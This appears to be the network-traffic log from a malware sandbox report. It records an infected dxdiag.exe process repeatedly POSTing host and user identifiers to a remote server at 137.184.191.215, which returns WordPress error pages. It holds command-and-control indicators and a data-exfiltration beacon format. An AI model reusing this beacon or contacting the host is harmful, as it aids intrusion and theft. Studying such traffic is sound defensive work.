                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:32.878442049 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:32.878451109 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:32.878458023 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.549727137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:33.028085947 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:33.034240961 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:35.676127911 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:33 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:35.676151991 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:35.676165104 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.549728137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:35.824728012 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:35.829673052 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:38.454127073 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:36 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:38.454142094 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:38.454153061 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.549729137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:38.616256952 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:38.621072054 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:41.422832966 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:39 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:41.422853947 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:41.422866106 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                        Oct 1, 2024 07:47:41.619241953 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:39 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.549730137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:41.692935944 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:41.697900057 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:44.200954914 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:42 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:44.200973034 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:44.200984955 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:44.200995922 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.549731137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:44.367630959 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:44.372627974 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:46.917253017 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:44 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
